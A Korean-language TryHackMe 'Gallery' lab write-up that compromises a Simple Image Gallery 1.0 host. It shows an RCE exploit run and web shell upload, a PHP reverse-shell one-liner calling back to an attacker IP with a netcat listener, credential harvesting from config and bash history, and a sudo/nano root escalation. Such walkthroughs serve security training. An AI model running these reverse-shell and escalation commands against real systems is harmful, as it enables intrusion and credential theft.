Taking Note, TryHackMe Gallery

Simple Gallery System RCE 및 권한 상승 상세 분석

이 문서는 Simple Gallery System CMS의 취약점을 이용한 침투 과정을 상세히 다룹니다. 초기 정보 수집 단계에서 CMS를 식별하고, 원격 코드 실행(RCE) 취약점을 통해 웹 쉘 및 리버스 쉘을 획득합니다. 이후 시스템 내부의 데이터베이스 계정과 사용자 계정 정보를 찾아내고, sudo 권한 상승 취약점을 활용하여 root 권한을 획득하는 전반적인 과정을 기술합니다.

정보 수집 (Information Gathering)

포트 스캔 (Port Scan)

Nmap 스캔 결과, 22(SSH), 80(HTTP - Apache2), 8080(HTTP - Simple Image Gallery System) 포트가 열려 있음을 확인했습니다.

# Nmap 7.95 scan initiated Thu Dec  4 13:52:50 2025 as: nmap -sC -sV -oA nmap.txt 10.48.160.0
Nmap scan report for 10.48.160.0
Host is up (0.14s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 d6:ad:9d:3b:94:c2:d2:17:44:4b:4d:77:37:2b:f1:36 (RSA)
|   256 be:fa:3a:85:ea:1e:35:c1:b3:c5:bc:b1:90:5f:6f:b9 (ECDSA)
|_  256 d1:a0:05:80:d0:f2:59:a3:50:69:17:61:bf:4c:3b:0e (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Simple Image Gallery System
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Thu Dec 4 13:53:36 2025 -- 1 IP address (1 host up) scanned in 45.32 seconds

디렉토리 탐색 (Directory Traversal)

Gobuster를 사용하여 웹 서버 디렉토리를 탐색한 결과 /gallery 경로가 발견되었습니다. /gallery로 접근 시 “Simple Gallery System”이 확인되었습니다.

gobuster dir -w ~/SecLists//Discovery/Web-Content/raft-large-directories.txt -u 10.49.136.138

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     <http://10.49.136.138>
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /Users/jako/private/cyber-skill-utils/SecLists//Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/gallery              (Status: 301) [Size: 316] [--> <http://10.49.136.138/gallery/>]

CMS 취약점 검색 (CMS Search)

searchsploit을 통해 “simple gallery” 관련 취약점을 검색했습니다. 이 과정에서 Simple Image Gallery 1.0의 Remote Code Execution (RCE) 취약점 (50214.py)이 식별되었습니다.

╰─$ searchsploit -t simple gallery
---------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                          |  Path
---------------------------------------------------------------------------------------- ---------------------------------
ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure                               | php/webapps/7819.txt
Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload                                    | php/webapps/6803.txt
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities     | php/webapps/49064.txt
Joomla! Component com_simplephotogallery 1.0 - Arbitrary File Upload                    | php/webapps/36373.txt
Joomla! Component com_simplephotogallery 1.0 - SQL Injection                            | php/webapps/36385.txt
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site S | php/webapps/44104.txt
MunkyScripts Simple Gallery - SQL Injection                                             | php/webapps/12045.html
Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)                | php/webapps/50214.py
Simple Image Gallery System 1.0 - 'id' SQL Injection                                    | php/webapps/50198.txt
Simple one-file Gallery - 'gallery.php?f' Cross-Site Scripting                          | php/webapps/29643.txt
Simple one-file Gallery - 'gallery.php?f' Traversal Arbitrary File Access               | php/webapps/29642.txt
Simple PHP Gallery 1.1 - 'System SP_Index.php' Cross-Site Scripting                     | php/webapps/29175.txt
Simple PHP Scripts Gallery 0.x - 'index.php' Cross-Site Scripting                       | php/webapps/31319.txt
SimpleGallery 0.1.3 - 'index.php' Cross-Site Scripting                                  | php/webapps/30811.txt
WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection                       | php/webapps/37113.txt
---------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

시스템 침투 (Exploitation)

원격 코드 실행 (RCE)

발견된 Exploit (50214.py)을 실행하여 웹 쉘을 업로드했습니다. 업로드된 쉘의 URL을 통해 서버 명령 실행이 가능함을 확인했습니다.

$ python3 /opt/homebrew/opt/exploitdb/share/exploitdb/exploits/php/webapps/50214.py
TARGET = 10.49.136.138/gallery
Login Bypass
shell name TagoaxivntyundngftfLetta

protecting user

User ID : 1
Firsname : Adminstrator
Lasname : Admin
Username : admin

shell uploading
- OK -
Shell URL : <http://10.49.136.138/gallery/uploads/1764909000_TagoaxivntyundngftfLetta.php?cmd=whoami>

쉘 획득 (Gaining Shell)

업로드된 웹 쉘을 이용하여 PHP 리버스 쉘 페이로드를 실행, 공격자 시스템으로 연결했습니다. 이 과정에서 URL 인코딩된 페이로드가 사용되었습니다. 획득된 비대화형 쉘은 Python3 pty 모듈을 통해 대화형 쉘로 전환되었습니다.

로컬 (공격자) 측 Netcat 리스너:

╰─$ nc -l 1234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

원격 (피해자) 측 PHP 리버스 쉘 페이로드 (URL 인코딩됨):

php -r '$sock=fsockopen("192.168.137.48",1234);exec("sh <&3 >&3 2>&3");'

php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.137.48%22%2C1234%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

대화형 쉘 전환:

python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ip-10-49-136-138:/var/www/html/gallery/uploads$

권한 상승 (Lateral Movement & Privilege Escalation)

CMS DB 계정 정보 획득

CMS 디렉토리 내 initialize.php 파일에서 DB 접속 계정 정보(사용자명: gallery_user, 비밀번호: passw0rd321, DB명: gallery_db)를 획득했습니다.

<?php
$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');

if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/");
if(!defined('base_app')) define('base_app', str_replace('\\\\','/',__DIR__).'/' );
if(!defined('dev_data')) define('dev_data',$dev_data);
if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"passw0rd321");
if(!defined('DB_NAME')) define('DB_NAME',"gallery_db");
?>

시스템 내부 탐색 (Enumeration)

시스템 탐색 중 /var/backups 디렉토리에서 mike_home_backup 백업 디렉토리가 확인되었습니다.

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxr-xr-x 1 www-data www-data 971926 Nov  1 04:39 /tmp/linpeas.sh
-rwxr-xr-x 1 root root 3772 May 24  2021 /var/backups/mike_home_backup/.bashrc
-rwxr-xr-x 1 root root 135 May 24  2021 /var/backups/mike_home_backup/.bash_history
-rwxr-xr-x 1 root root 220 May 24  2021 /var/backups/mike_home_backup/.bash_logout
-rwxr-xr-x 1 root root 20549 May 24  2021 /var/backups/mike_home_backup/images/23-04.jpg
-rwxr-xr-x 1 root root 159262 May 24  2021 /var/backups/mike_home_backup/images/my-cat.jpg
-rwxr-xr-x 1 root root 436526 May 24  2021 /var/backups/mike_home_backup/images/26-04.jpg
-rwxr-xr-x 1 root root 103 May 24  2021 /var/backups/mike_home_backup/documents/accounts.txt
-rwxr-xr-x 1 root root 807 May 24  2021 /var/backups/mike_home_backup/.profile

사용자 계정 정보 획득

mike_home_backup/.bash_history 파일에서 mike 사용자의 비밀번호(b3stpassw0rdbr0xx)가 발견되었습니다.

www-data@ip-10-48-160-0:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -l b3stpassw0rdbr0xx
clear
sudo -l
exit

권한 에스컬레이션 (Privilege Escalation)

mike 계정으로 SSH 접속 후 sudo -l 명령어를 통해 mike가 /opt/rootkit.sh 스크립트를 root 권한으로 암호 없이 실행할 수 있음이 확인되었습니다.

mike@ip-10-49-136-138:~$ sudo -l
Matching Defaults entries for mike on ip-10-49-136-138:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User mike may run the following commands on ip-10-49-136-138:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh

/opt/rootkit.sh 스크립트는 nano /root/report.txt 실행 옵션을 포함하고 있습니다.

#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac

nano 편집기 내에서 ^R^X 단축키를 이용, reset; sh 1>&0 2>&0 명령을 실행하여 root 쉘을 획득했습니다.

nano
^R^X
reset; sh 1>&0 2>&0